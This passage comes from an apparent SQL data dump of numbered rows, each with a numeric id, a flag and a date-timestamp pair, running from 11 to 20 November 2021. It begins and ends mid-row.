14:52:46'),(38145,1598,1,'2021-11-11','2021-11-11 15:22:58'),(38146,3107,1,'2021-11-11','2021-11-11 17:23:26'),(38147,2457,1,'2021-11-11','2021-11-11 17:56:16'),(38148,2911,1,'2021-11-11','2021-11-11 17:56:52'),(38149,3253,1,'2021-11-11','2021-11-11 18:21:46'),(38150,3253,1,'2021-11-11','2021-11-11 18:24:39'),(38151,1594,1,'2021-11-11','2021-11-11 18:26:39'),(38152,76,1,'2021-11-11','2021-11-11 18:30:35'),(38153,84,1,'2021-11-11','2021-11-11 18:31:41'),(38154,2309,1,'2021-11-11','2021-11-11 18:34:10'),(38155,76,1,'2021-11-11','2021-11-11 18:36:59'),(38156,87,1,'2021-11-11','2021-11-11 18:37:10'),(38157,91,1,'2021-11-11','2021-11-11 18:37:24'),(38158,3253,1,'2021-11-11','2021-11-11 18:40:37'),(38159,2911,1,'2021-11-11','2021-11-11 18:41:39'),(38160,3253,1,'2021-11-11','2021-11-11 18:42:15'),(38161,3253,1,'2021-11-11','2021-11-11 18:42:45'),(38162,1600,1,'2021-11-11','2021-11-11 19:02:50'),(38163,3253,1,'2021-11-11','2021-11-11 19:02:59'),(38164,1606,1,'2021-11-11','2021-11-11 19:03:02'),(38165,3253,1,'2021-11-11','2021-11-11 19:10:02'),(38166,1728,1,'2021-11-11','2021-11-11 19:20:59'),(38167,1592,1,'2021-11-11','2021-11-11 19:26:42'),(38168,1592,1,'2021-11-11','2021-11-11 19:56:39'),(38169,2617,1,'2021-11-11','2021-11-11 20:01:47'),(38170,2617,1,'2021-11-11','2021-11-11 20:02:21'),(38171,2748,1,'2021-11-11','2021-11-11 20:02:31'),(38172,2617,1,'2021-11-11','2021-11-11 20:03:02'),(38173,1606,1,'2021-11-11','2021-11-11 20:18:35'),(38174,3251,1,'2021-11-11','2021-11-11 20:19:34'),(38175,1709,1,'2021-11-11','2021-11-11 20:32:56'),(38176,3271,1,'2021-11-11','2021-11-11 20:41:37'),(38177,3285,1,'2021-11-11','2021-11-11 21:04:10'),(38178,72,1,'2021-11-11','2021-11-11 21:41:20'),(38179,1600,1,'2021-11-11','2021-11-11 22:27:55'),(38180,1724,1,'2021-11-11','2021-11-11 23:23:35'),(38181,1602,1,'2021-11-12','2021-11-12 00:13:26'),(38182,1776,1,'2021-11-12','2021-11-12 00:13:31'),(38183,2813,1,'2021-11-12','2021-11-12 00:35:58'),(38184,4238,1,'2021-11-12','2021-11-12 02:08:23'),(38185,1778,1,'2021-11-12','2021-11-12 02:10:42'),(38186,1600,1,'2021-11-12','2021-11-12 02:12:28'),(38187,1778,1,'2021-11-12','2021-11-12 02:14:54'),(38188,3531,1,'2021-11-12','2021-11-12 02:16:11'),(38189,3752,1,'2021-11-12','2021-11-12 02:19:43'),(38190,1870,1,'2021-11-12','2021-11-12 02:33:42'),(38191,3127,1,'2021-11-12','2021-11-12 02:39:12'),(38192,4448,1,'2021-11-12','2021-11-12 02:56:20'),(38193,1588,1,'2021-11-12','2021-11-12 03:40:42'),(38194,4391,1,'2021-11-12','2021-11-12 03:41:11'),(38195,4301,1,'2021-11-12','2021-11-12 03:44:43'),(38196,2617,1,'2021-11-12','2021-11-12 03:54:35'),(38197,3752,1,'2021-11-12','2021-11-12 04:48:37'),(38198,2769,1,'2021-11-12','2021-11-12 04:58:12'),(38199,72,1,'2021-11-12','2021-11-12 04:58:56'),(38200,2609,1,'2021-11-12','2021-11-12 05:17:55'),(38201,1582,1,'2021-11-12','2021-11-12 06:06:04'),(38202,3253,1,'2021-11-12','2021-11-12 07:00:48'),(38203,3253,1,'2021-11-12','2021-11-12 07:12:03'),(38204,2813,1,'2021-11-12','2021-11-12 07:17:54'),(38205,3253,1,'2021-11-12','2021-11-12 07:23:56'),(38206,3253,1,'2021-11-12','2021-11-12 07:25:50'),(38207,1870,1,'2021-11-12','2021-11-12 07:46:43'),(38208,1588,1,'2021-11-12','2021-11-12 08:04:23'),(38209,2309,1,'2021-11-12','2021-11-12 08:33:13'),(38210,2410,1,'2021-11-12','2021-11-12 08:48:09'),(38211,3060,1,'2021-11-12','2021-11-12 08:56:21'),(38212,4457,1,'2021-11-12','2021-11-12 09:56:29'),(38213,2309,1,'2021-11-12','2021-11-12 10:15:25'),(38214,2309,1,'2021-11-12','2021-11-12 10:16:23'),(38215,3069,1,'2021-11-12','2021-11-12 10:52:42'),(38216,1588,1,'2021-11-12','2021-11-12 12:56:31'),(38217,3096,1,'2021-11-12','2021-11-12 13:22:06'),(38218,3096,1,'2021-11-12','2021-11-12 13:28:25'),(38219,3096,1,'2021-11-12','2021-11-12 13:28:48'),(38220,1588,1,'2021-11-12','2021-11-12 13:55:08'),(38221,1602,1,'2021-11-12','2021-11-12 14:38:52'),(38222,1608,1,'2021-11-12','2021-11-12 15:52:35'),(38223,1722,1,'2021-11-12','2021-11-12 15:57:46'),(38224,2804,1,'2021-11-12','2021-11-12 16:03:57'),(38225,3482,1,'2021-11-12','2021-11-12 18:01:05'),(38226,2989,1,'2021-11-12','2021-11-12 18:32:19'),(38227,4329,1,'2021-11-12','2021-11-12 18:55:46'),(38228,72,1,'2021-11-12','2021-11-12 19:08:19'),(38229,1598,1,'2021-11-12','2021-11-12 19:08:58'),(38230,1582,1,'2021-11-12','2021-11-12 19:36:52'),(38231,1877,1,'2021-11-12','2021-11-12 19:51:20'),(38232,4457,1,'2021-11-12','2021-11-12 19:53:58'),(38233,2297,1,'2021-11-12','2021-11-12 19:59:36'),(38234,1612,1,'2021-11-12','2021-11-12 20:14:30'),(38235,1602,1,'2021-11-12','2021-11-12 20:36:40'),(38236,3746,1,'2021-11-12','2021-11-12 21:06:19'),(38237,1582,1,'2021-11-12','2021-11-12 23:17:07'),(38238,4457,1,'2021-11-12','2021-11-12 23:36:50'),(38239,76,1,'2021-11-12','2021-11-12 23:52:17'),(38240,1707,1,'2021-11-13','2021-11-13 00:47:26'),(38241,2309,1,'2021-11-13','2021-11-13 03:56:56'),(38242,1594,1,'2021-11-13','2021-11-13 04:43:04'),(38243,3285,1,'2021-11-13','2021-11-13 05:15:30'),(38244,4448,1,'2021-11-13','2021-11-13 05:20:42'),(38245,1600,1,'2021-11-13','2021-11-13 05:41:40'),(38246,487,1,'2021-11-13','2021-11-13 06:29:55'),(38247,1588,1,'2021-11-13','2021-11-13 08:25:49'),(38248,80,1,'2021-11-13','2021-11-13 09:38:03'),(38249,1747,1,'2021-11-13','2021-11-13 10:26:28'),(38250,1778,1,'2021-11-13','2021-11-13 10:56:39'),(38251,1592,1,'2021-11-13','2021-11-13 11:47:34'),(38252,1602,1,'2021-11-13','2021-11-13 13:29:29'),(38253,3127,1,'2021-11-13','2021-11-13 14:53:04'),(38254,1598,1,'2021-11-13','2021-11-13 15:04:52'),(38255,1598,1,'2021-11-13','2021-11-13 15:04:54'),(38256,1594,1,'2021-11-13','2021-11-13 15:17:27'),(38257,1598,1,'2021-11-13','2021-11-13 15:47:51'),(38258,4457,1,'2021-11-13','2021-11-13 16:08:20'),(38259,3041,1,'2021-11-13','2021-11-13 17:20:59'),(38260,335,1,'2021-11-13','2021-11-13 17:31:01'),(38261,68,1,'2021-11-13','2021-11-13 17:31:14'),(38262,1588,1,'2021-11-13','2021-11-13 19:38:02'),(38263,1602,1,'2021-11-13','2021-11-13 19:45:19'),(38264,477,1,'2021-11-13','2021-11-13 20:23:00'),(38265,72,1,'2021-11-13','2021-11-13 21:05:47'),(38266,80,1,'2021-11-13','2021-11-13 21:15:11'),(38267,80,1,'2021-11-13','2021-11-13 21:16:19'),(38268,1586,1,'2021-11-13','2021-11-13 22:24:32'),(38269,3030,1,'2021-11-13','2021-11-13 22:45:14'),(38270,484,1,'2021-11-13','2021-11-13 23:57:23'),(38271,4457,1,'2021-11-14','2021-11-14 02:24:49'),(38272,72,1,'2021-11-14','2021-11-14 04:58:35'),(38273,1768,1,'2021-11-14','2021-11-14 05:14:59'),(38274,467,1,'2021-11-14','2021-11-14 06:45:07'),(38275,2457,1,'2021-11-14','2021-11-14 07:08:16'),(38276,3307,1,'2021-11-14','2021-11-14 07:18:48'),(38277,1602,1,'2021-11-14','2021-11-14 07:40:00'),(38278,2965,1,'2021-11-14','2021-11-14 07:59:36'),(38279,2804,1,'2021-11-14','2021-11-14 08:06:45'),(38280,68,1,'2021-11-14','2021-11-14 08:26:33'),(38281,80,1,'2021-11-14','2021-11-14 08:40:51'),(38282,3030,1,'2021-11-14','2021-11-14 08:54:43'),(38283,1598,1,'2021-11-14','2021-11-14 08:55:09'),(38284,4238,1,'2021-11-14','2021-11-14 09:29:35'),(38285,469,1,'2021-11-14','2021-11-14 09:34:22'),(38286,3789,1,'2021-11-14','2021-11-14 10:31:13'),(38287,3251,1,'2021-11-14','2021-11-14 11:09:09'),(38288,87,1,'2021-11-14','2021-11-14 13:32:13'),(38289,3482,1,'2021-11-14','2021-11-14 13:32:15'),(38290,2159,1,'2021-11-14','2021-11-14 13:46:47'),(38291,1600,1,'2021-11-14','2021-11-14 13:51:04'),(38292,2159,1,'2021-11-14','2021-11-14 13:52:49'),(38293,487,1,'2021-11-14','2021-11-14 14:17:10'),(38294,80,1,'2021-11-14','2021-11-14 14:29:24'),(38295,1544,1,'2021-11-14','2021-11-14 15:16:15'),(38296,1544,1,'2021-11-14','2021-11-14 15:16:15'),(38297,1544,1,'2021-11-14','2021-11-14 15:16:19'),(38298,1544,1,'2021-11-14','2021-11-14 16:02:09'),(38299,2309,1,'2021-11-14','2021-11-14 16:10:47'),(38300,1598,1,'2021-11-14','2021-11-14 16:40:34'),(38301,3072,1,'2021-11-14','2021-11-14 17:32:07'),(38302,4387,1,'2021-11-14','2021-11-14 18:04:15'),(38303,1608,1,'2021-11-14','2021-11-14 18:06:18'),(38304,3058,1,'2021-11-14','2021-11-14 18:28:03'),(38305,3104,1,'2021-11-14','2021-11-14 19:04:38'),(38306,2457,1,'2021-11-14','2021-11-14 19:15:22'),(38307,1720,1,'2021-11-14','2021-11-14 19:36:17'),(38308,4387,1,'2021-11-14','2021-11-14 19:39:04'),(38309,1709,1,'2021-11-14','2021-11-14 19:46:24'),(38310,4457,1,'2021-11-14','2021-11-14 19:52:16'),(38311,3090,1,'2021-11-14','2021-11-14 20:04:00'),(38312,472,1,'2021-11-14','2021-11-14 21:10:08'),(38313,3251,1,'2021-11-14','2021-11-14 21:34:01'),(38314,2297,1,'2021-11-14','2021-11-14 21:41:13'),(38315,1612,1,'2021-11-14','2021-11-14 22:05:09'),(38316,3746,1,'2021-11-14','2021-11-14 22:32:44'),(38317,80,1,'2021-11-15','2021-11-15 00:11:32'),(38318,1600,1,'2021-11-15','2021-11-15 02:15:14'),(38319,4457,1,'2021-11-15','2021-11-15 02:35:51'),(38320,1600,1,'2021-11-15','2021-11-15 03:00:12'),(38321,2956,1,'2021-11-15','2021-11-15 04:31:31'),(38322,3482,1,'2021-11-15','2021-11-15 04:31:31'),(38323,3498,1,'2021-11-15','2021-11-15 04:31:31'),(38324,3438,1,'2021-11-15','2021-11-15 04:32:02'),(38325,3430,1,'2021-11-15','2021-11-15 04:32:06'),(38326,4436,1,'2021-11-15','2021-11-15 04:47:17'),(38327,4436,1,'2021-11-15','2021-11-15 04:47:18'),(38328,4436,1,'2021-11-15','2021-11-15 04:47:20'),(38329,80,1,'2021-11-15','2021-11-15 05:18:19'),(38330,4448,1,'2021-11-15','2021-11-15 06:50:33'),(38331,2813,1,'2021-11-15','2021-11-15 07:35:17'),(38332,472,1,'2021-11-15','2021-11-15 08:36:37'),(38333,80,1,'2021-11-15','2021-11-15 09:18:01'),(38334,3285,1,'2021-11-15','2021-11-15 09:37:58'),(38335,2309,1,'2021-11-15','2021-11-15 09:59:29'),(38336,72,1,'2021-11-15','2021-11-15 10:25:05'),(38337,72,1,'2021-11-15','2021-11-15 10:27:10'),(38338,1586,1,'2021-11-15','2021-11-15 10:55:29'),(38339,1602,1,'2021-11-15','2021-11-15 11:12:58'),(38340,1602,1,'2021-11-15','2021-11-15 11:13:14'),(38341,72,1,'2021-11-15','2021-11-15 11:23:49'),(38342,2991,1,'2021-11-15','2021-11-15 11:42:03'),(38343,1614,1,'2021-11-15','2021-11-15 11:49:18'),(38344,1614,1,'2021-11-15','2021-11-15 12:06:51'),(38345,3060,1,'2021-11-15','2021-11-15 12:11:43'),(38346,2991,1,'2021-11-15','2021-11-15 12:15:43'),(38347,1776,1,'2021-11-15','2021-11-15 13:39:46'),(38348,4457,1,'2021-11-15','2021-11-15 13:52:43'),(38349,1588,1,'2021-11-15','2021-11-15 14:14:22'),(38350,72,1,'2021-11-15','2021-11-15 14:24:02'),(38351,4341,1,'2021-11-15','2021-11-15 14:24:58'),(38352,3127,1,'2021-11-15','2021-11-15 15:06:36'),(38353,4457,1,'2021-11-15','2021-11-15 15:12:55'),(38354,4448,1,'2021-11-15','2021-11-15 15:36:32'),(38355,467,1,'2021-11-15','2021-11-15 16:13:13'),(38356,467,1,'2021-11-15','2021-11-15 16:31:02'),(38357,1582,1,'2021-11-15','2021-11-15 20:08:02'),(38358,1703,1,'2021-11-15','2021-11-15 20:31:46'),(38359,1602,1,'2021-11-15','2021-11-15 20:51:52'),(38360,1588,1,'2021-11-15','2021-11-15 21:23:25'),(38361,1594,1,'2021-11-15','2021-11-15 21:56:58'),(38362,1722,1,'2021-11-15','2021-11-15 21:59:56'),(38363,1586,1,'2021-11-15','2021-11-15 22:38:53'),(38364,1544,1,'2021-11-15','2021-11-15 23:48:59'),(38365,1588,1,'2021-11-16','2021-11-16 06:39:22'),(38366,2178,1,'2021-11-16','2021-11-16 07:08:08'),(38367,2617,1,'2021-11-16','2021-11-16 07:37:50'),(38368,2617,1,'2021-11-16','2021-11-16 07:40:01'),(38369,1703,1,'2021-11-16','2021-11-16 07:51:56'),(38370,467,1,'2021-11-16','2021-11-16 08:00:13'),(38371,2457,1,'2021-11-16','2021-11-16 08:06:51'),(38372,2457,1,'2021-11-16','2021-11-16 08:18:01'),(38373,2178,1,'2021-11-16','2021-11-16 08:19:39'),(38374,3307,1,'2021-11-16','2021-11-16 08:24:15'),(38375,1768,1,'2021-11-16','2021-11-16 09:13:05'),(38376,4238,1,'2021-11-16','2021-11-16 09:16:14'),(38377,4238,1,'2021-11-16','2021-11-16 09:27:12'),(38378,2609,1,'2021-11-16','2021-11-16 09:40:42'),(38379,3307,1,'2021-11-16','2021-11-16 09:51:41'),(38380,1602,1,'2021-11-16','2021-11-16 10:11:21'),(38381,2457,1,'2021-11-16','2021-11-16 11:18:46'),(38382,80,1,'2021-11-16','2021-11-16 11:22:32'),(38383,80,1,'2021-11-16','2021-11-16 11:33:48'),(38384,80,1,'2021-11-16','2021-11-16 11:43:53'),(38385,2617,1,'2021-11-16','2021-11-16 12:11:19'),(38386,2617,1,'2021-11-16','2021-11-16 12:11:20'),(38387,2617,1,'2021-11-16','2021-11-16 12:12:39'),(38388,1582,1,'2021-11-16','2021-11-16 12:27:58'),(38389,3789,1,'2021-11-16','2021-11-16 12:30:29'),(38390,1728,1,'2021-11-16','2021-11-16 12:33:35'),(38391,1582,1,'2021-11-16','2021-11-16 12:52:31'),(38392,478,1,'2021-11-16','2021-11-16 13:12:18'),(38393,469,1,'2021-11-16','2021-11-16 13:38:02'),(38394,4457,1,'2021-11-16','2021-11-16 14:30:54'),(38395,87,1,'2021-11-16','2021-11-16 14:47:22'),(38396,3691,1,'2021-11-16','2021-11-16 14:53:40'),(38397,3257,1,'2021-11-16','2021-11-16 15:18:22'),(38398,76,1,'2021-11-16','2021-11-16 15:18:22'),(38399,3006,1,'2021-11-16','2021-11-16 15:32:19'),(38400,3482,1,'2021-11-16','2021-11-16 15:54:51'),(38401,1602,1,'2021-11-16','2021-11-16 16:24:14'),(38402,2809,1,'2021-11-16','2021-11-16 16:29:10'),(38403,487,1,'2021-11-16','2021-11-16 16:39:51'),(38404,3430,1,'2021-11-16','2021-11-16 17:03:36'),(38405,2809,1,'2021-11-16','2021-11-16 18:05:21'),(38406,3058,1,'2021-11-16','2021-11-16 18:46:37'),(38407,1602,1,'2021-11-16','2021-11-16 18:49:09'),(38408,1602,1,'2021-11-16','2021-11-16 18:51:18'),(38409,1598,1,'2021-11-16','2021-11-16 19:13:28'),(38410,1608,1,'2021-11-16','2021-11-16 19:13:55'),(38411,1608,1,'2021-11-16','2021-11-16 19:14:07'),(38412,2159,1,'2021-11-16','2021-11-16 19:14:42'),(38413,2159,1,'2021-11-16','2021-11-16 19:19:05'),(38414,3104,1,'2021-11-16','2021-11-16 19:21:57'),(38415,2457,1,'2021-11-16','2021-11-16 19:48:20'),(38416,1720,1,'2021-11-16','2021-11-16 20:00:38'),(38417,4387,1,'2021-11-16','2021-11-16 20:09:18'),(38418,1544,1,'2021-11-16','2021-11-16 20:19:52'),(38419,76,1,'2021-11-16','2021-11-16 20:22:16'),(38420,3038,1,'2021-11-16','2021-11-16 20:42:31'),(38421,472,1,'2021-11-16','2021-11-16 21:13:27'),(38422,1695,1,'2021-11-16','2021-11-16 21:27:14'),(38423,3104,1,'2021-11-16','2021-11-16 21:34:10'),(38424,1602,1,'2021-11-16','2021-11-16 21:57:12'),(38425,1598,1,'2021-11-16','2021-11-16 22:19:51'),(38426,3430,1,'2021-11-16','2021-11-16 22:26:02'),(38427,87,1,'2021-11-16','2021-11-16 22:38:42'),(38428,467,1,'2021-11-16','2021-11-16 22:39:24'),(38429,1582,1,'2021-11-16','2021-11-16 23:01:38'),(38430,1582,1,'2021-11-16','2021-11-16 23:01:59'),(38431,1602,1,'2021-11-16','2021-11-16 23:06:47'),(38432,1598,1,'2021-11-16','2021-11-16 23:20:41'),(38433,4387,1,'2021-11-16','2021-11-16 23:44:08'),(38434,4387,1,'2021-11-16','2021-11-16 23:45:23'),(38435,1598,1,'2021-11-16','2021-11-16 23:55:28'),(38436,4396,1,'2021-11-17','2021-11-17 00:47:45'),(38437,72,1,'2021-11-17','2021-11-17 01:29:50'),(38438,1600,1,'2021-11-17','2021-11-17 02:56:24'),(38439,467,1,'2021-11-17','2021-11-17 02:58:49'),(38440,1600,1,'2021-11-17','2021-11-17 03:43:34'),(38441,1600,1,'2021-11-17','2021-11-17 04:14:09'),(38442,3259,1,'2021-11-17','2021-11-17 05:42:59'),(38443,1588,1,'2021-11-17','2021-11-17 05:44:06'),(38444,3038,1,'2021-11-17','2021-11-17 05:59:47'),(38445,1780,1,'2021-11-17','2021-11-17 06:03:59'),(38446,3259,1,'2021-11-17','2021-11-17 06:15:19'),(38447,1734,1,'2021-11-17','2021-11-17 06:26:33'),(38448,2813,1,'2021-11-17','2021-11-17 06:32:13'),(38449,1582,1,'2021-11-17','2021-11-17 06:54:35'),(38450,3746,1,'2021-11-17','2021-11-17 06:59:06'),(38451,1544,1,'2021-11-17','2021-11-17 07:00:39'),(38452,2769,1,'2021-11-17','2021-11-17 07:33:11'),(38453,1734,1,'2021-11-17','2021-11-17 07:46:05'),(38454,3746,1,'2021-11-17','2021-11-17 08:07:23'),(38455,1612,1,'2021-11-17','2021-11-17 08:14:48'),(38456,4448,1,'2021-11-17','2021-11-17 08:30:38'),(38457,1594,1,'2021-11-17','2021-11-17 08:33:54'),(38458,1594,1,'2021-11-17','2021-11-17 08:35:36'),(38459,72,1,'2021-11-17','2021-11-17 09:23:01'),(38460,3285,1,'2021-11-17','2021-11-17 09:35:49'),(38461,4457,1,'2021-11-17','2021-11-17 09:41:46'),(38462,4457,1,'2021-11-17','2021-11-17 09:41:59'),(38463,1594,1,'2021-11-17','2021-11-17 09:51:10'),(38464,68,1,'2021-11-17','2021-11-17 09:56:03'),(38465,570,1,'2021-11-17','2021-11-17 10:07:21'),(38466,570,1,'2021-11-17','2021-11-17 10:07:29'),(38467,570,1,'2021-11-17','2021-11-17 10:07:43'),(38468,1594,1,'2021-11-17','2021-11-17 10:18:04'),(38469,91,1,'2021-11-17','2021-11-17 10:18:49'),(38470,2178,1,'2021-11-17','2021-11-17 10:22:44'),(38471,91,1,'2021-11-17','2021-11-17 10:23:16'),(38472,108,1,'2021-11-17','2021-11-17 10:45:07'),(38473,4457,1,'2021-11-17','2021-11-17 11:03:46'),(38474,2309,1,'2021-11-17','2021-11-17 11:29:00'),(38475,4457,1,'2021-11-17','2021-11-17 11:41:37'),(38476,3038,1,'2021-11-17','2021-11-17 12:05:32'),(38477,1602,1,'2021-11-17','2021-11-17 12:13:30'),(38478,1600,1,'2021-11-17','2021-11-17 12:28:44'),(38479,1602,1,'2021-11-17','2021-11-17 12:30:39'),(38480,3253,1,'2021-11-17','2021-11-17 12:44:09'),(38481,2309,1,'2021-11-17','2021-11-17 13:01:19'),(38482,1606,1,'2021-11-17','2021-11-17 13:02:29'),(38483,87,1,'2021-11-17','2021-11-17 13:10:28'),(38484,1720,1,'2021-11-17','2021-11-17 13:32:31'),(38485,1602,1,'2021-11-17','2021-11-17 13:35:17'),(38486,1614,1,'2021-11-17','2021-11-17 13:44:19'),(38487,3313,1,'2021-11-17','2021-11-17 13:49:22'),(38488,3787,1,'2021-11-17','2021-11-17 14:15:57'),(38489,3097,1,'2021-11-17','2021-11-17 14:37:13'),(38490,1612,1,'2021-11-17','2021-11-17 14:57:07'),(38491,1594,1,'2021-11-17','2021-11-17 15:43:51'),(38492,1592,1,'2021-11-17','2021-11-17 16:14:17'),(38493,4436,1,'2021-11-17','2021-11-17 16:51:17'),(38494,1600,1,'2021-11-17','2021-11-17 17:20:50'),(38495,2658,1,'2021-11-17','2021-11-17 17:23:54'),(38496,91,1,'2021-11-17','2021-11-17 17:25:36'),(38497,76,1,'2021-11-17','2021-11-17 17:54:51'),(38498,2159,1,'2021-11-17','2021-11-17 18:04:09'),(38499,3742,1,'2021-11-17','2021-11-17 18:53:53'),(38500,1602,1,'2021-11-17','2021-11-17 18:55:00'),(38501,1602,1,'2021-11-17','2021-11-17 18:55:02'),(38502,3742,1,'2021-11-17','2021-11-17 19:05:39'),(38503,2503,1,'2021-11-17','2021-11-17 19:17:38'),(38504,470,1,'2021-11-17','2021-11-17 19:46:18'),(38505,2457,1,'2021-11-17','2021-11-17 20:18:25'),(38506,3531,1,'2021-11-17','2021-11-17 22:00:21'),(38507,80,1,'2021-11-17','2021-11-17 22:18:21'),(38508,80,1,'2021-11-17','2021-11-17 22:18:35'),(38509,2748,1,'2021-11-17','2021-11-17 22:41:48'),(38510,1598,1,'2021-11-17','2021-11-17 23:46:52'),(38511,68,1,'2021-11-18','2021-11-18 00:23:53'),(38512,72,1,'2021-11-18','2021-11-18 00:30:55'),(38513,2769,1,'2021-11-18','2021-11-18 00:41:35'),(38514,1602,1,'2021-11-18','2021-11-18 00:47:27'),(38515,3664,1,'2021-11-18','2021-11-18 00:59:38'),(38516,72,1,'2021-11-18','2021-11-18 01:00:21'),(38517,1594,1,'2021-11-18','2021-11-18 01:21:18'),(38518,3051,1,'2021-11-18','2021-11-18 02:26:34'),(38519,1544,1,'2021-11-18','2021-11-18 04:44:49'),(38520,2159,1,'2021-11-18','2021-11-18 04:53:42'),(38521,1718,1,'2021-11-18','2021-11-18 05:00:44'),(38522,2751,1,'2021-11-18','2021-11-18 06:15:46'),(38523,87,1,'2021-11-18','2021-11-18 07:29:19'),(38524,1602,1,'2021-11-18','2021-11-18 08:06:15'),(38525,1608,1,'2021-11-18','2021-11-18 09:08:47'),(38526,68,1,'2021-11-18','2021-11-18 09:10:03'),(38527,76,1,'2021-11-18','2021-11-18 09:10:19'),(38528,72,1,'2021-11-18','2021-11-18 09:15:05'),(38529,76,1,'2021-11-18','2021-11-18 09:30:09'),(38530,1612,1,'2021-11-18','2021-11-18 10:50:54'),(38531,1612,1,'2021-11-18','2021-11-18 11:15:22'),(38532,76,1,'2021-11-18','2021-11-18 11:15:43'),(38533,76,1,'2021-11-18','2021-11-18 11:17:26'),(38534,68,1,'2021-11-18','2021-11-18 11:17:37'),(38535,76,1,'2021-11-18','2021-11-18 11:26:13'),(38536,1608,1,'2021-11-18','2021-11-18 11:39:10'),(38537,1604,1,'2021-11-18','2021-11-18 14:33:06'),(38538,1604,1,'2021-11-18','2021-11-18 14:34:28'),(38539,1604,1,'2021-11-18','2021-11-18 14:35:17'),(38540,1602,1,'2021-11-18','2021-11-18 14:46:42'),(38541,3781,1,'2021-11-18','2021-11-18 14:52:48'),(38542,472,1,'2021-11-18','2021-11-18 14:53:14'),(38543,1588,1,'2021-11-18','2021-11-18 15:30:59'),(38544,2309,1,'2021-11-18','2021-11-18 15:40:58'),(38545,2658,1,'2021-11-18','2021-11-18 15:49:22'),(38546,72,1,'2021-11-18','2021-11-18 16:09:16'),(38547,2309,1,'2021-11-18','2021-11-18 16:24:53'),(38548,467,1,'2021-11-18','2021-11-18 16:46:07'),(38549,1718,1,'2021-11-18','2021-11-18 17:28:26'),(38550,1718,1,'2021-11-18','2021-11-18 17:28:54'),(38551,1718,1,'2021-11-18','2021-11-18 17:29:02'),(38552,1718,1,'2021-11-18','2021-11-18 17:29:30'),(38553,2457,1,'2021-11-18','2021-11-18 19:09:18'),(38554,3691,1,'2021-11-18','2021-11-18 19:18:14'),(38555,80,1,'2021-11-18','2021-11-18 22:17:27'),(38556,1604,1,'2021-11-19','2021-11-19 00:54:02'),(38557,1604,1,'2021-11-19','2021-11-19 00:54:05'),(38558,1604,1,'2021-11-19','2021-11-19 00:54:07'),(38559,1606,1,'2021-11-19','2021-11-19 00:54:57'),(38560,1606,1,'2021-11-19','2021-11-19 00:54:58'),(38561,1606,1,'2021-11-19','2021-11-19 00:55:00'),(38562,1604,1,'2021-11-19','2021-11-19 00:55:30'),(38563,1598,1,'2021-11-19','2021-11-19 00:55:42'),(38564,1598,1,'2021-11-19','2021-11-19 00:55:43'),(38565,1598,1,'2021-11-19','2021-11-19 00:55:45'),(38566,1604,1,'2021-11-19','2021-11-19 00:56:03'),(38567,68,1,'2021-11-19','2021-11-19 04:06:55'),(38568,1604,1,'2021-11-19','2021-11-19 06:11:38'),(38569,2309,1,'2021-11-19','2021-11-19 06:37:33'),(38570,2309,1,'2021-11-19','2021-11-19 06:39:41'),(38571,4301,1,'2021-11-19','2021-11-19 07:04:22'),(38572,1582,1,'2021-11-19','2021-11-19 07:05:11'),(38573,2813,1,'2021-11-19','2021-11-19 07:33:48'),(38574,1600,1,'2021-11-19','2021-11-19 07:36:44'),(38575,1600,1,'2021-11-19','2021-11-19 07:43:12'),(38576,1588,1,'2021-11-19','2021-11-19 08:01:38'),(38577,1588,1,'2021-11-19','2021-11-19 08:04:16'),(38578,1594,1,'2021-11-19','2021-11-19 08:29:19'),(38579,3710,1,'2021-11-19','2021-11-19 08:40:59'),(38580,2419,1,'2021-11-19','2021-11-19 09:35:51'),(38581,1602,1,'2021-11-19','2021-11-19 09:49:58'),(38582,1612,1,'2021-11-19','2021-11-19 10:21:22'),(38583,1594,1,'2021-11-19','2021-11-19 10:36:20'),(38584,4238,1,'2021-11-19','2021-11-19 10:45:27'),(38585,3285,1,'2021-11-19','2021-11-19 10:56:41'),(38586,3691,1,'2021-11-19','2021-11-19 11:13:17'),(38587,1606,1,'2021-11-19','2021-11-19 11:43:40'),(38588,1602,1,'2021-11-19','2021-11-19 11:47:53'),(38589,2769,1,'2021-11-19','2021-11-19 11:53:54'),(38590,1582,1,'2021-11-19','2021-11-19 12:03:54'),(38591,1602,1,'2021-11-19','2021-11-19 12:26:39'),(38592,1612,1,'2021-11-19','2021-11-19 12:30:43'),(38593,4400,1,'2021-11-19','2021-11-19 12:32:01'),(38594,2609,1,'2021-11-19','2021-11-19 12:33:25'),(38595,4382,1,'2021-11-19','2021-11-19 12:35:46'),(38596,4363,1,'2021-11-19','2021-11-19 12:37:01'),(38597,4420,1,'2021-11-19','2021-11-19 12:38:01'),(38598,1602,1,'2021-11-19','2021-11-19 12:38:12'),(38599,4416,1,'2021-11-19','2021-11-19 12:39:06'),(38600,1602,1,'2021-11-19','2021-11-19 12:41:53'),(38601,1612,1,'2021-11-19','2021-11-19 13:26:56'),(38602,1586,1,'2021-11-19','2021-11-19 14:07:05'),(38603,1596,1,'2021-11-19','2021-11-19 14:15:47'),(38604,72,1,'2021-11-19','2021-11-19 14:22:45'),(38605,4457,1,'2021-11-19','2021-11-19 14:35:47'),(38606,2309,1,'2021-11-19','2021-11-19 15:32:17'),(38607,470,1,'2021-11-19','2021-11-19 16:21:08'),(38608,80,1,'2021-11-19','2021-11-19 17:09:59'),(38609,1720,1,'2021-11-19','2021-11-19 17:58:52'),(38610,4363,1,'2021-11-19','2021-11-19 17:59:22'),(38611,3430,1,'2021-11-19','2021-11-19 18:02:50'),(38612,4412,1,'2021-11-19','2021-11-19 18:04:41'),(38613,2809,1,'2021-11-19','2021-11-19 18:12:14'),(38614,1780,1,'2021-11-19','2021-11-19 18:17:47'),(38615,1614,1,'2021-11-19','2021-11-19 18:26:06'),(38616,3038,1,'2021-11-19','2021-11-19 18:43:51'),(38617,4363,1,'2021-11-19','2021-11-19 18:52:49'),(38618,2809,1,'2021-11-19','2021-11-19 19:35:23'),(38619,470,1,'2021-11-19','2021-11-19 19:56:31'),(38620,2309,1,'2021-11-19','2021-11-19 20:34:42'),(38621,1780,1,'2021-11-19','2021-11-19 21:48:15'),(38622,72,1,'2021-11-19','2021-11-19 22:13:37'),(38623,2159,1,'2021-11-19','2021-11-19 23:01:15'),(38624,4432,1,'2021-11-19','2021-11-19 23:02:00'),(38625,2159,1,'2021-11-19','2021-11-19 23:02:47'),(38626,1722,1,'2021-11-19','2021-11-19 23:12:26'),(38627,1722,1,'2021-11-19','2021-11-19 23:13:05'),(38628,1722,1,'2021-11-19','2021-11-19 23:13:13'),(38629,1703,1,'2021-11-19','2021-11-19 23:54:43'),(38630,2617,1,'2021-11-20','2021-11-20 